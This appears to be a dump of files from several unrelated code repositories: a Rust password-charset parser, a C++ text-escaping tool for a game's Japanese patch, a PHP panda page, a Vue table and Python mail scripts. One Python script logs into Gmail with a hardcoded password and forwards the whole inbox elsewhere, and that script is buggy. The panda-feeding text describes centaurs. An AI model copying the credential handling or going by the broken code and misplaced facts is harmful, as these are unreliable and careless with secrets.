    /// "d"/"e"/"easy"/"dist" select `Dist`, "*"/"a"/"all"/"any" select
    /// `All`, and "0"/"n"/"none" select `None`. Anything else produces
    /// an `Error::ParseError` carrying the original input.
    fn from_str(s: &str) -> Result<Self, Self::Err> {
        let normalized = s.to_lowercase();
        match normalized.as_str() {
            "d" | "e" | "easy" | "dist" => Ok(Self::Dist),
            "*" | "a" | "all" | "any" => Ok(Self::All),
            "0" | "n" | "none" => Ok(Self::None),
            _ => Err(Error::ParseError(s.to_string())),
        }
    }
}
/// The special-character charsets a password may draw from.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
pub enum Special {
/// The full selection of special characters (see `SPECIAL_ALL`).
All,
/// Only the most usual, easiest-to-type special characters.
Basic,
/// No special characters at all.
None,
}
impl FromStr for Special {
    type Err = Error;

    /// Parses a case-insensitive textual alias into a [`Special`]
    /// charset: "b"/"basic" select `Basic`, "*"/"a"/"all"/"any" select
    /// `All`, and "0"/"n"/"none" select `None`. Anything else produces
    /// an `Error::ParseError` carrying the original input.
    fn from_str(s: &str) -> Result<Self, Self::Err> {
        let normalized = s.to_lowercase();
        match normalized.as_str() {
            "b" | "basic" => Ok(Self::Basic),
            "*" | "a" | "all" | "any" => Ok(Self::All),
            "0" | "n" | "none" => Ok(Self::None),
            _ => Err(Error::ParseError(s.to_string())),
        }
    }
}
impl CollatingSeq for Alpha {
    /// Returns the static slice of letters backing this variant; the
    /// `None` variant maps to the empty charset.
    fn characters(&self) -> &[char] {
        match self {
            Self::All => &ALPHA_ALL,
            Self::Dist => &ALPHA_DIST,
            Self::Lower => &ALPHA_LOWER,
            Self::Upper => &ALPHA_UPPER,
            Self::None => &NONE,
        }
    }
}
impl CollatingSeq for Digit {
    /// Returns the static slice of digits backing this variant; the
    /// `None` variant maps to the empty charset.
    fn characters(&self) -> &[char] {
        match self {
            Self::All => &DIGIT_ALL,
            Self::Dist => &DIGIT_DIST,
            Self::None => &NONE,
        }
    }
}
impl CollatingSeq for Special {
    /// Returns the static slice of special characters backing this
    /// variant; the `None` variant maps to the empty charset.
    fn characters(&self) -> &[char] {
        match self {
            Self::All => &SPECIAL_ALL,
            Self::Basic => &SPECIAL_BASIC,
            Self::None => &NONE,
        }
    }
}
| bd67870f651e89945382fd7c8efb8b2ef548a62d | [
"TOML",
"Rust",
"Markdown"
] | 10 | Rust | xgillard/passg | 20f37e0010e42c5dabfef63d1a4ae92476d8151c | 56ddf705c7dc74de95db1008e43ed48f6ffea9e2 |
refs/heads/master | <repo_name>841723906/EU4SpecialEscape<file_sep>/README.md
# EU4SpecialEscape
## これはなに?
Steam配信されているWindows版Europa Universalis IVの日本語化パッチの副産物です。パッチはこのプログラムを使って変換されたテキストのみを受け付けます。
## 環境
Windows7 以上
## 使いかたパターン1
適当なフォルダを用意します。
変換したいテキストが入ったファイルを下記に注意して、上記のフォルダ内に保存してください。上記のフォルダ内にさらにフォルダを作ってその中にテキストを置くような階層構造にしても大丈夫です。
- BOM付きのUTF-8
- ファイル名をxxx.utf8b.yyyにする。xxxは任意の文字列。yyyはa~zとA~Zと0~9のみ使用可能
上記のフォルダを、ConsoleApplication3.exeにドラッグアンドドロップしてください。フォルダ内に、xxx.yyyとして変換されたテキストが保存されます。
## 使い方パターン2
適当なフォルダを用意します。
変換したいテキストが入ったファイルを下記に注意して、上記のフォルダ内に保存してください。上記のフォルダ内にさらにフォルダを作ってその中にテキストを置くような階層構造にしても大丈夫です。
- BOMなしのUTF-8
- ファイル名をxxx.yyy.utf8にする。xxxは任意の文字列。yyyはa~zとA~Zと0~9とアンダースコア(_)のみ使用可能
上記のフォルダを、ConsoleApplication3.exeにドラッグアンドドロップしてください。フォルダ内に、xxx.yyyとして変換されたテキストが保存されます。
## ビルドの仕方
VC2015以上でConsoleApplication3.slnを開き、ビルドしてください。
## ライセンス
MITライセンス<file_sep>/ConsoleApplication3/ConsoleApplication3.cpp
#include "stdafx.h"
errno_t subUTF8(const wchar_t *source, wchar_t *baseFileName);
errno_t subUTF8B(const wchar_t *source, wchar_t *baseFileName);
errno_t loadTextFromBinary(const wchar_t *source, char **to) {
errno_t success = 0;
errno_t readFileError = 0;
FILE *fp;
int error = 0;
struct _stat statData;
int readSize = 0;
if (source == NULL) {
success = 1;
goto F;
}
/* */
error = _wstat(source, &statData);
if (error != NULL) {
success = 2;
goto F;
}
/* */
readFileError = _wfopen_s(&fp, source, L"rb");
if (readFileError != NULL) {
success = 3;
goto F;
}
/* */
*to = (char*)calloc(statData.st_size + 1, sizeof(char));
if (*to == NULL) {
success = 4;
goto A;
}
/* */
readSize = fread_s(*to, statData.st_size, sizeof(char), statData.st_size, fp);
if (readSize != statData.st_size) {
success = 5;
goto A;
}
A:
fclose(fp);
F:
return success;
}
errno_t removeBOM(const char *from, char **to) {
errno_t success = 0;
errno_t err = 0;
unsigned int size = 0;
/* */
if (from == NULL) {
success = 1;
goto A;
}
/* */
if (strlen(from) < 4) {
success = 2;
goto A;
}
/* */
if (!((from[0] == ((char)0xEF)) && (from[1] == (char)0xBB) && (from[2] == (char)0xBF))) {
success = 3;
goto A;
}
/* */
size = strlen(from);
/* */
*to = (char*)calloc(size - 2, sizeof(char));
if (*to == NULL) {
success = 4;
goto A;
}
/* */
err = memcpy_s(*to, size - 2, from + 3, size - 3);
if (err) {
success = 5;
goto B;
}
goto A;
B:
free(*to);
A:
return success;
}
errno_t convertTextToWideText(const char* from, wchar_t **to) {
errno_t success = 0;
unsigned int err = 0;
unsigned int wideTextSize = 0;
/* */
if (from == NULL) {
success = 1;
goto A;
}
/* */
wideTextSize = MultiByteToWideChar(
CP_UTF8,
NULL,
from,
-1,
NULL,
NULL);
if (wideTextSize == NULL) {
success = GetLastError();
goto A;
}
/* */
*to = (wchar_t*)calloc(wideTextSize, sizeof(wchar_t));
if (*to == NULL) {
success = 3;
goto A;
}
/* */
err = MultiByteToWideChar(
CP_UTF8,
NULL,
from,
-1,
*to,
wideTextSize);
if (err == NULL) {
success = 4;
goto B;
}
goto A;
B:
free(*to);
A:
return success;
}
inline wchar_t UCS2ToCP1252(int cp) {
wchar_t result = cp;
switch (cp) {
case 0x20AC: result = 0x80; break;
case 0x201A: result = 0x82; break;
case 0x0192: result = 0x83; break;
case 0x201E: result = 0x84; break;
case 0x2026: result = 0x85; break;
case 0x2020: result = 0x86; break;
case 0x2021: result = 0x87; break;
case 0x02C6: result = 0x88; break;
case 0x2030: result = 0x89; break;
case 0x0160: result = 0x8A; break;
case 0x2039: result = 0x8B; break;
case 0x0152: result = 0x8C; break;
case 0x017D: result = 0x8E; break;
case 0x2018: result = 0x91; break;
case 0x2019: result = 0x92; break;
case 0x201C: result = 0x93; break;
case 0x201D: result = 0x94; break;
case 0x2022: result = 0x95; break;
case 0x2013: result = 0x96; break;
case 0x2014: result = 0x97; break;
case 0x02DC: result = 0x98; break;
case 0x2122: result = 0x99; break;
case 0x0161: result = 0x9A; break;
case 0x203A: result = 0x9B; break;
case 0x0153: result = 0x9C; break;
case 0x017E: result = 0x9E; break;
case 0x0178: result = 0x9F; break;
}
return result;
}
inline wchar_t cp1252ToUCS2(byte cp) {
wchar_t result = cp;
switch (cp) {
case 0x80: result = 0x20AC; break;
case 0x82: result = 0x201A; break;
case 0x83: result = 0x0192; break;
case 0x84: result = 0x201E; break;
case 0x85: result = 0x2026; break;
case 0x86: result = 0x2020; break;
case 0x87: result = 0x2021; break;
case 0x88: result = 0x02C6; break;
case 0x89: result = 0x2030; break;
case 0x8A: result = 0x0160; break;
case 0x8B: result = 0x2039; break;
case 0x8C: result = 0x0152; break;
case 0x8E: result = 0x017D; break;
case 0x91: result = 0x2018; break;
case 0x92: result = 0x2019; break;
case 0x93: result = 0x201C; break;
case 0x94: result = 0x201D; break;
case 0x95: result = 0x2022; break;
case 0x96: result = 0x2013; break;
case 0x97: result = 0x2014; break;
case 0x98: result = 0x02DC; break;
case 0x99: result = 0x2122; break;
case 0x9A: result = 0x0161; break;
case 0x9B: result = 0x203A; break;
case 0x9C: result = 0x0153; break;
case 0x9E: result = 0x017E; break;
case 0x9F: result = 0x0178; break;
}
return result;
}
errno_t convertWideTextToEscapedWideText(const wchar_t* from, wchar_t** to) {
errno_t success = 0;
int toIndex = 0;
unsigned int size = 0;
/* */
if (from == NULL) {
success = 1;
goto A;
}
/* */
size = wcslen(from);
/* 全部エスケープしても3倍を超えることはない。10はバッファ*/
*to = (wchar_t*)calloc(size * 3 + 10, sizeof(wchar_t));
if (*to == NULL) {
success = 2;
goto A;
}
/* */
toIndex = 0;
for (unsigned int fromIndex = 0; fromIndex < size; fromIndex++) {
wchar_t cp = from[fromIndex];
/* */
if (UCS2ToCP1252(cp) != cp) {
(*to)[toIndex++] = cp;
continue;
}
/* ずらす */
if (cp > 0x100 && cp < 0xA00) {
cp = cp + 0xE000;
}
/* 上位バイト */
byte high = (cp >> 8) & 0x000000FF;
/* 下位バイト */
byte low = cp & 0x000000FF;
byte escapeChr = 0x10;
/* 2byteじゃない */
if (high == 0) {
(*to)[toIndex++] = cp;
continue;
}
/* high byteより決定 */
switch (high) {
case 0xA4:case 0xA3:case 0xA7:case 0x24:case 0x5B:case 0x00:case 0x5C:
case 0x20:case 0x0D:case 0x0A:case 0x22:case 0x7B:case 0x7D:case 0x40:
case 0x80:case 0x7E:case 0x2F:
escapeChr += 2;
break;
default:
break;
}
/* low byteより決定 */
switch (low) {
case 0xA4:case 0xA3:case 0xA7:case 0x24:case 0x5B:case 0x00:case 0x5C:
case 0x20:case 0x0D:case 0x0A:case 0x22:case 0x7B:case 0x7D:case 0x40:
case 0x80:case 0x7E:case 0x2F:
escapeChr++;
break;
default:
break;
}
switch (escapeChr) {
case 0x11:
low += 14;
break;
case 0x12:
high -= 9;
break;
case 0x13:
low += 14;
high -= 9;
break;
case 0x10:
default:
break;
}
(*to)[toIndex++] = escapeChr;
(*to)[toIndex++] = cp1252ToUCS2(low);
(*to)[toIndex++] = cp1252ToUCS2(high);
}
A:
return success;
}
errno_t convertWideTextToText(const wchar_t* from, char **to) {
errno_t success = 0;
int size = 0;
int err = 0;
/* */
if (from == NULL) {
success = 1;
goto A;
}
/* */
size = WideCharToMultiByte(
CP_UTF8,
0,
from,
-1,
NULL,
0,
NULL,
NULL
);
if (size == NULL) {
success = 2;
goto A;
}
/* */
*to = (char*)malloc(size * sizeof(char));
if (*to == NULL) {
success = 3;
goto A;
}
/* */
err = WideCharToMultiByte(
CP_UTF8,
0,
from,
-1,
*to,
size,
NULL,
NULL
);
if (err == NULL) {
success = 4;
goto B;
}
goto A;
B:
free(*to);
A:
return success;
}
errno_t attachWildCard(const wchar_t* from, wchar_t ** to) {
errno_t error = 0;
unsigned int size = 0;
errno_t err = 0;
/* */
if (from == NULL) {
error = 1;
goto A;
}
/* */
size = wcslen(from);
/* */
*to = (wchar_t*)calloc(size + 3, sizeof(wchar_t));
if (*to == NULL) {
error = 2;
goto A;
}
/* */
err = wmemcpy_s(*to, size, from, size);
if (err) {
error = 3;
goto B;
}
/* */
(*to)[size] = L'\\';
(*to)[size + 1] = L'*';
/* */
goto A;
B:
free(*to);
A:
return error;
}
errno_t attachBOM(const char* from, char ** to) {
errno_t error = 0;
unsigned int size = 0;
/* */
if (from == NULL) {
error = 1;
goto A;
}
/* */
size = strlen(from);
/* */
*to = (char*)calloc(size + 4, sizeof(char));
if (*to == NULL) {
error = 2;
goto A;
}
/* UTF-8 BOM */
(*to)[0] = (char)0xEF;
(*to)[1] = (char)0xBB;
(*to)[2] = (char)0xBF;
/* */
if (memcpy_s(*to + 3, size + 4, from, size)) {
error = 3;
goto B;
}
/* */
goto A;
B:
free(*to);
A:
return error;
}
/* Cpp code */
const std::wregex FILE_NAME_PATTERN1(L"^(.+)\.utf8b(\.[a-zA-Z0-9]+)$");
const std::wregex FILE_NAME_PATTERN2(L"^(.+)\.(\.[a-zA-Z0-9_]+).utf8$");
inline errno_t getBaseFileName(const wchar_t *source, wchar_t **to, const std::wregex pattern) {
errno_t error = 0;
std::wcmatch match;
/* */
try {
if (!std::regex_match(source, match, pattern)) {
/* Not match */
*to = NULL;
goto A;
}
/* */
unsigned int size = wcslen(source);
/* */
*to = (wchar_t*)calloc(size, sizeof(wchar_t));
if (*to == NULL) {
error = 1;
goto A;
}
/* */
std::wstring tmp = match.str(1); /* + match.str( */
wcscat_s(*to, tmp.length() + 1, tmp.c_str());
}
catch (std::regex_error& e) {
error = 1;
}
A:
return error;
}
errno_t getFullPath(wchar_t *from[], wchar_t **to) {
errno_t error = 0;
wchar_t *err = NULL;
/* */
if (!(*++from)) {
error = 1;
goto F;
}
/* */
*to = (wchar_t*)calloc(_MAX_PATH, sizeof(wchar_t));
if (*to == NULL) {
error = 2;
goto F;
}
/* */
err = _wfullpath(*to, *from, _MAX_PATH);
if (*err == NULL) {
error = 3;
goto A;
}
/* */
goto F;
A:
free(*to);
F:
return error;
}
/* http://www14.big.or.jp/~ken1/tech/tech5.html */
errno_t digDir(const wchar_t *source)
{
errno_t success = 0;
wchar_t subpath[_MAX_PATH];
wchar_t temp[_MAX_PATH];
HANDLE h;
WIN32_FIND_DATA lp;
/* */
errno_t err = wcscpy_s(temp, source);
if (err > 0) {
success = 1;
goto A;
}
/* */
h = FindFirstFile(temp, &lp);
if (INVALID_HANDLE_VALUE == h) {
success = 2;
goto A;
}
/* delete last '*' */
temp[wcslen(temp) - 1] = '\0';
/* */
do
{
/* isDir */
if ((lp.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) &&
(wcscmp(lp.cFileName, L"..") != 0) &&
(wcscmp(lp.cFileName, L".") != 0)
) {
/* TODO:check len */
int len = wsprintf(subpath, L"%s%s\\*", temp, lp.cFileName);
/* */
errno_t err2 = digDir(subpath);
if (err2 > 0) {
success = 3;
goto B;
}
}
/* isFile */
if ((lp.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) != FILE_ATTRIBUTE_DIRECTORY) {
/* */
wchar_t *baseFileName;
errno_t err3 = getBaseFileName(lp.cFileName, &baseFileName,FILE_NAME_PATTERN1);
if (err3 > 0) {
success = 4;
goto B;
}
/* */
if (baseFileName != NULL) {
/* TODO:check len */
wchar_t fileFullPath[_MAX_PATH];
int len = wsprintf(fileFullPath, L"%s%s", temp, lp.cFileName);
/* */
errno_t errSub = subUTF8B(fileFullPath, baseFileName);
free(baseFileName);
if (errSub > 0) {
goto B;
}
}
else {
errno_t err4 = getBaseFileName(lp.cFileName, &baseFileName, FILE_NAME_PATTERN2);
if (err4 > 0) {
success = 4;
goto B;
}
if (baseFileName != NULL) {
/* TODO:check len */
wchar_t fileFullPath[_MAX_PATH];
int len = wsprintf(fileFullPath, L"%s%s", temp, lp.cFileName);
/* */
errno_t errSub = subUTF8(fileFullPath, baseFileName);
free(baseFileName);
if (errSub > 0) {
goto B;
}
}
}
}
} while (FindNextFile(h, &lp));
B:
FindClose(h);
A:
return success;
}
/**/
int wmain(int argc, wchar_t *argv[], wchar_t *envp[])
{
errno_t error = 0;
wchar_t *fullPath = NULL;
wchar_t *attachWildCardFullPath = NULL;
/* */
error = getFullPath(argv, &fullPath);
if (error > 0) {
printf("引数異常:%d", error);
goto A;
}
/* */
error = attachWildCard(fullPath, &attachWildCardFullPath);
if (error > 0) {
printf("ワイルドカード添付異常:%d", error);
goto B;
}
/* */
error = digDir(attachWildCardFullPath);
if (error > 0) {
printf("ディレクトリ検出異常:%d", error);
goto C;
}
C:
free(attachWildCardFullPath);
B:
free(fullPath);
A:
return 0;
}
errno_t saveTextToBinary2(const wchar_t *source, const wchar_t *baseFileName, const char* from) {
errno_t success = 0;
int file_size = 0;
errno_t fopen_err = 0;
if (source == NULL) {
success = 1;
goto F;
}
wchar_t drive[_MAX_DRIVE];
wchar_t dir[_MAX_DIR];
wchar_t fname[_MAX_FNAME];
wchar_t ext[_MAX_EXT];
/* */
_wsplitpath_s(
source,
drive,
dir,
fname,
ext
);
/* */
wchar_t exportPath[_MAX_EXT];
_wmakepath_s(exportPath, drive, dir, fname, L"");
/* */
FILE *fw;
fopen_err = _wfopen_s(&fw, exportPath, L"wb");
if (fopen_err) {
success = 3;
goto F;
}
/* */
file_size = fwrite(from, sizeof(char), strlen(from), fw);
if (file_size != strlen(from)) {
success = 4;
goto A;
}
A:
fclose(fw);
F:
return success;
}
errno_t saveTextToBinary(const wchar_t *source, const wchar_t *baseFileName, const char* from) {
errno_t success = 0;
int file_size = 0;
errno_t fopen_err = 0;
if (source == NULL) {
success = 1;
goto F;
}
wchar_t drive[_MAX_DRIVE];
wchar_t dir[_MAX_DIR];
wchar_t fname[_MAX_FNAME];
wchar_t ext[_MAX_EXT];
/* */
_wsplitpath_s(
source,
drive,
dir,
fname,
ext
);
/* */
wchar_t exportPath[_MAX_EXT];
_wmakepath_s(exportPath, drive, dir, baseFileName, ext);
/* */
FILE *fw;
fopen_err = _wfopen_s(&fw, exportPath, L"wb");
if (fopen_err) {
success = 3;
goto F;
}
/* */
file_size = fwrite(from, sizeof(char), strlen(from), fw);
if (file_size != strlen(from)) {
success = 4;
goto A;
}
A:
fclose(fw);
F:
return success;
}
/* */
errno_t subUTF8(const wchar_t *source, wchar_t *baseFileName) {
errno_t ans = 0;
char *importText = NULL;
char *noBOMtext = NULL;
wchar_t *wideNoBOMtext = NULL;
wchar_t *escapedNoBOMWideText = NULL;
char *escapedNoBOMText = NULL;
char* escapedText = NULL;
/* */
ans = loadTextFromBinary(source, &importText);
if (ans > 0) {
printf("ファイルからテキストを読み込めない:%d", ans);
goto A;
}
/* */
ans = convertTextToWideText(importText, &wideNoBOMtext);
if (ans > 0) {
printf("M->Wが変換できなかった:%d", ans);
goto C;
}
/* */
ans = convertWideTextToEscapedWideText(wideNoBOMtext, &escapedNoBOMWideText);
if (ans > 0) {
printf("エスケープに失敗した:%d", ans);
goto D;
}
/* */
ans = convertWideTextToText(escapedNoBOMWideText, &escapedNoBOMText);
if (ans > 0) {
printf("W->Mが変換できなかった:%d", ans);
goto E;
}
/* */
ans = attachBOM(escapedNoBOMText, &escapedText);
if (ans > 0) {
printf("BOMをつけるのに失敗:%d", ans);
goto F;
}
/* */
ans = saveTextToBinary2(source, baseFileName, escapedText);
if (ans > 0) {
printf("ファイルをセーブするのに失敗:%d", ans);
}
G:
free(escapedText);
F:
free(escapedNoBOMText);
E:
free(escapedNoBOMWideText);
D:
free(wideNoBOMtext);
C:
free(noBOMtext);
B:
free(importText);
A:
return ans;
}
/* */
errno_t subUTF8B(const wchar_t *source, wchar_t *baseFileName) {
errno_t ans = 0;
char *importText = NULL;
char *noBOMtext = NULL;
wchar_t *wideNoBOMtext = NULL;
wchar_t *escapedNoBOMWideText = NULL;
char *escapedNoBOMText = NULL;
char* escapedText = NULL;
/* */
ans = loadTextFromBinary(source, &importText);
if (ans > 0) {
printf("ファイルからテキストを読み込めない:%d", ans);
goto A;
}
/* */
ans = removeBOM(importText, &noBOMtext);
if (ans > 0) {
printf("BOMがついていないからUTF-8じゃない:%d", ans);
goto B;
}
/* */
ans = convertTextToWideText(noBOMtext, &wideNoBOMtext);
if (ans > 0) {
printf("M->Wが変換できなかった:%d", ans);
goto C;
}
/* */
ans = convertWideTextToEscapedWideText(wideNoBOMtext, &escapedNoBOMWideText);
if (ans > 0) {
printf("エスケープに失敗した:%d", ans);
goto D;
}
/* */
ans = convertWideTextToText(escapedNoBOMWideText, &escapedNoBOMText);
if (ans > 0) {
printf("W->Mが変換できなかった:%d", ans);
goto E;
}
/* */
ans = attachBOM(escapedNoBOMText, &escapedText);
if (ans > 0) {
printf("BOMをつけるのに失敗:%d",ans);
goto F;
}
/* */
ans = saveTextToBinary(source, baseFileName, escapedText);
if (ans > 0) {
printf("ファイルをセーブするのに失敗:%d", ans);
goto G;
}
G:
free(escapedText);
F:
free(escapedNoBOMText);
E:
free(escapedNoBOMWideText);
D:
free(wideNoBOMtext);
C:
free(noBOMtext);
B:
free(importText);
A:
return ans;
}
| 0a46ea15d95717b147cbbcded0ebd34bd187badc | [
"Markdown",
"C++"
] | 2 | Markdown | 841723906/EU4SpecialEscape | 3c9a1cc633ff71c8bd52744b25320bf701fa19fa | 41bf39cd56f44d333c130c7c2d809c79c0826f90 |
refs/heads/main | <repo_name>Katia-Casta/examen<file_sep>/index.php
<!DOCTYPE html>
<html>
<head>
<title>CASTAÑEDA</title>
<meta charset="utf-8">
<?php require_once "dependencias.php"; ?>
<?php require_once "contenido.php"; $datos=contenido();?>
<script type="text/javascript" src="script.js"></script>
<link rel="stylesheet" href="css/estilos/stilo.css">
</head>
<body >
<body background="img/fondo1.jpg">
<div class="container">
<h1 class="tinta1"> B A M B O O </h1>
<h2 class="tinta2">Conoce a los Pandas</h2>
<div class="hola">
<?php require_once "movi.php";
?>
</div>
</div>
</body>
</html>
<file_sep>/contenido.php
<?php
function contenido(){
$datos=array();
$datos[0]="img/panda3.jpg"."||".
"OSO PANDA"."||".
"El oso panda es un animal mamífero que habita en zonas montañosas y boscosas de China. Se trata de una especie plantígrada (ya que, al desplazarse, apoya la totalidad de la planta de las manos y de los pies en la superficie) que se caracteriza por la combinación de pelo negro en las orejas, la cara, los hombros y las patas y pelo blanco en el resto del cuerpo.";
$datos[1]="img/panda2.jpg"."||".
"PANDA Y GRUPO FAMILIAR"."||".
"El panda pertenece al grupo familiar de los úrsidos u osos, de acuerdo a diversos estudios científicos. Sin embargo, tiempo atrás solía ubicarse al panda entre los prociónidos o mapaches.";
$datos[2]="img/panda1.jpg"."||".
"ALIMENTACION DEL PANDA"."||".
"En la mitología griega, el centauro es una criatura con la cabeza, los brazos y el torso de un humano y el cuerpo y las patas de un caballo. Las versiones femeninas reciben el nombre de centáurides.";
return $datos;
}
?> | 5b704c9b67f51ce97497190c55f77fb71fd7f6c3 | [
"PHP"
] | 2 | PHP | Katia-Casta/examen | 59a994246b45b65eeaa15784460e56730ce5f693 | c3b2c2a98fac85234157e122ddff15f0227c5be5 |
refs/heads/master | <file_sep>var app = new Vue({
el: '#app',
created: function(){
this.getData()
},
methods: {
getData: function(){
var vm = this;
$.ajax({
url: 'https://jsonplaceholder.typicode.com/posts',
method: 'GET'
}).then(function (data) {
vm.items = data;
});
}
},
data () {
return {
search: '',
headers: [
{
text: 'No.',
align: 'left',
sortable: false,
value: 'no'
},
{ text: 'HO ID', value: 'hoid', sortable: false },
{ text: 'Commission', value: 'commission' },
{ text: 'Deposit', value: 'deposit' },
{ text: 'Deposit(Transfer)', value: 'deptransfer' },
{ text: 'Withdraw', value: 'withdraw' },
{ text: 'Withdraw(Transfer)', value: 'withtransfer' },
{ text: 'Betting Amount', value: 'betamount' },
{ text: 'Rake', value: 'rake' },
{ text: 'User Holding Money', value: 'userholding' },
{ text: 'Operating Head Office Profit', value: 'offprofit' },
{ text: 'Head Office Money', value: 'offmoney' },
{ text: 'Money of Low Rank', value: 'moneylowrank' },
{ text: 'Low Rank', value: 'lowrank' },
],
items: []
}
}
}); | f63755fdaf4064f51a2d4adea8b0ae529765a799 | [
"JavaScript"
] | 1 | JavaScript | tristansalao/vuejs-ex | b80485b47e2107e6e60ba6d2701dd2ae48724fd2 | cbff0b424f2f02df429a8afac7792c8c858d4915 |
refs/heads/master | <file_sep>import os
import sys
import logging
sys.path.append('Module/')
from MailSend import mxmMail
# Allow us to run using installed `libgmail` or the one in parent directory.
try:
import libgmail
## Wouldn't this the preffered way?
## We shouldn't raise a warning about a normal import
##logging.warn("Note: Using currently installed `libgmail` version.")
except ImportError:
# Urghhh...
sys.path.insert(1,
os.path.realpath(os.path.join(os.path.dirname(__file__),
os.path.pardir)))
import libgmail
# -*- Encoding: UTF-8 -*-
from MailSend import mxmMail
serveur = '192.168.1.24' # votre serveur SMTP ici
ga = libgmail.GmailAccount("<EMAIL>", "fdfgdfgdfgfg")
ga.login()
folder = ga.getMessagesByFolder('inbox',True)
for thread in folder:
for msg in thread:
expediteur = msg.sender
print expediteur
destinataire = "<EMAIL>"
sujet = msg.subject
message = msg
print message
if msg.attachments:
for attach in msg.attachments :
myMsg.prependFile(attach)
myMsg.attachmentAppend(attach)
myMsg = mxmMail("Forward", expediteur, sujet,message,serveur)
myMsg.recipientAppend('Clients', destinataire)
myMsg.send()
print "done"
<file_sep>#!/usr/bin/env python
# -*- Encoding: UTF-8 -*-
"""
Ceci est une reprise du programme mxmail.
24/03/2006 -utilisation du module email
"""
import string, sys, types, os, tempfile, time
import email
from email import Encoders
from email.MIMEAudio import MIMEAudio
from email.MIMEBase import MIMEBase
from email.MIMEImage import MIMEImage
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
import mimetypes
import smtplib
def FICHIER( chemin ):
"""Guess the content type based on the file's extension. Encoding
will be ignored, altough we should check for simple things like
gzip'd or compressed files."""
ctype, encoding = mimetypes.guess_type(chemin)
if ctype is None or encoding is not None:
# No guess could be made, or the file is encoded (compresses), so
# use a generic bag-of-bits type.
ctype = 'application.octet-stream'
maintype, subtype = ctype.split('/', 1)
if maintype == 'text':
fp = open(chemin)
# Note : we should handle calculating the charset
msg = MIMEText(fp.read(), _subtype=subtype)
fp.close()
elif maintype == 'image':
fp = open(chemin, 'rb')
msg = MIMEImage(fp.read(), _subtype=subtype)
fp.close()
elif maintype == 'audio':
fp = open(chemin, 'rb')
msg = MIMEAudio(fp.read(), _subtype=subtype)
fp.close()
else:
fp = open(chemin, 'rb')
msg = MIMEBase(maintype, subtype)
msg.set_payload(fp.read())
fp.close()
# Encode the payload using Base64
Encoders.encode_base64(msg)
# Set the filename parameter
fichier = os.path.basename(chemin)
msg.add_header('Content-Disposition','attachment',filename=fichier)
return msg
class mxmMail:
"""
mxmMail est client e-mail qui permet d'envoyer un e-mail de la même façon
qu'en utilisant un simple client e-mail comme outlook express ou le client
mail de netscape.
Licence: TIUISICIIDC (Take it, use it, sell it, change it. I dont care.)
contact: <EMAIL>, <EMAIL>, <EMAIL>
"""
def __init__(self, fromName='', fromAddress='', subject='', message='', SMTPServer=''):
self.fromName = fromName
self.fromAddress = fromAddress
self.subject = subject
self.message = message
self.recipients = []
self.attachments = []
self.SMTPServer = SMTPServer
def __str__(self):
return self.message
def prepend(self, text):
"""
Ajoute une chaine avant le corps du message.
"""
self.message = text + self.message
def append(self, text):
"""
Ajoute une chaine après le corps du message.
"""
self.message = self.message + text
def prependFile(self, fileName):
"""
Cette méthode ajoute le contenu d'un fichier texte avant le corps du
message.
Une utilisation est d'ajouter fichier d'entête commun au début du
message.
Cela peut être fait plusieurs fois pour ajouter différents fichiers
texte dans un ordre spécifique.
Si le fichier ne peut être ouvert, la méthode va échoué silencieusement.
C'est un choix délibéré pour que les mailings automatiques ne soient pas
arrêtés par des fichiers entêtes/pieds manquants.
"""
try:
file = open(fileName)
self.prepend(file.read())
except:
pass # Just fail silently
def appendFile(self, fileName):
"""
Cette méthode ajoute le contenu d'un fichier texte avant le corps du
message.
Une utilisation est d'ajouter un fichier signature à la fin du message.
Cela peut être fait plusieurs fois pour ajouter différents fichiers
texte dans un ordre spécifique.
Si le fichier ne peut être ouvert, la méthode va échouer silencieusement.
C'est un choix délibéré pour que les mailings automatiques ne soient pas
arrêtés par des fichiers entêtes/pieds manquants.
"""
try:
file = open(fileName)
self.append(file.read())
except:
pass # Just fail silently
def recipientAppend(self, toName, toAddress):
"""
Ajoute un destinataire de plus au message.
"""
self.recipients.append({'toName':toName, 'toAddress':toAddress})
def setRecipients(self, recipients=[]):
self.recipients = recipients
def attachmentAppend(self, fileName):
"""
Ajoute une pièce jointe au message. Elle est automatiquement converti
dans un type mime.
"""
self.attachments.append(fileName)
def send(self):
"""Envoie le message."""
message = MIMEMultipart()
message['From'] = self.fromAddress
message['Subject'] = self.subject
recipientList = []
for recipient in self.recipients:
recipientList.append(recipient['toAddress'])
adressList = string.join(recipientList, '; ')
message['To'] = adressList
if type(self.message) == str:
message.attach(MIMEText(self.message,'html') )
elif type(self.message) == unicode:
message.attach( MIMEText(self.message.encode('utf-8'), 'html', 'utf-8') )
for attachFile in self.attachments:
# encodes the attached files
if type(attachFile) == types.StringType:
fileName = attachFile
filePath = attachFile
elif type(attachFile) == types.TupleType and len(attachFile) == 2:
filePath,fileName = attachFile
else:
raise "Attachments Error: must be pathname string or path,filename tuple"
message.attach( FICHIER(attachFile) )
#try:
server = smtplib.SMTP(self.SMTPServer)
server.sendmail(self.fromAddress, recipientList, message.as_string())
#finally:
server.quit()
def save(self, fileName):
"""
Saves the message to a file. Including attachements and pre/appended files.
"""
file = open(fileName, 'w')
file.write(str(self))
file.close()
if __name__ == '__main__':
# Exemple d'utilisation de la classe mxmMail
serveur = 'smtp.wanadoo.fr' # votre serveur SMTP ici
expediteur = '<EMAIL>' # Votre adresse email
destinataire = '<EMAIL>' # L'adresse de votre destinataire
sujet = u"Un message du président de la république"
message = u'<html><body><a href="http://www.bussieresama.net">bussiere</a></body></html>'
#myMsg = mxmMail(NomExpéditeur, AdresseExpediteur, Sujet, Texte, serveurSMTP)
myMsg = mxmMail("<NAME>", expediteur, sujet,message,serveur)
# Ajoute un destinataire : myMsg.recipientAppend(Nom, Adresse)
myMsg.recipientAppend('Bussiere', destinataire)
#myMsg.prependFile('D:/Programmation/MailSend/test.txt')
#myMsg.appendFile('C:/root/desktop/sig.txt')
myMsg.attachmentAppend('D:/Programmation/MailSend/test.txt')
#myMsg.setRecipients([{'toName':'fghdfg','toAddress':'<EMAIL>'}, {'toName':'xcvxcv','toAddress':'<EMAIL>'}])
myMsg.send()
# vim:ts=4<file_sep>import cherrypy
class roote:
def __init__(self):
pass
nom = ""
passwd = ""
def doLogin(self, username=None, password=None):
self.nom = username
self.passwd = password
return self.page()
def index(self,username=None,password=None):
return self.page()
index.exposed = True
doLogin.exposed = True
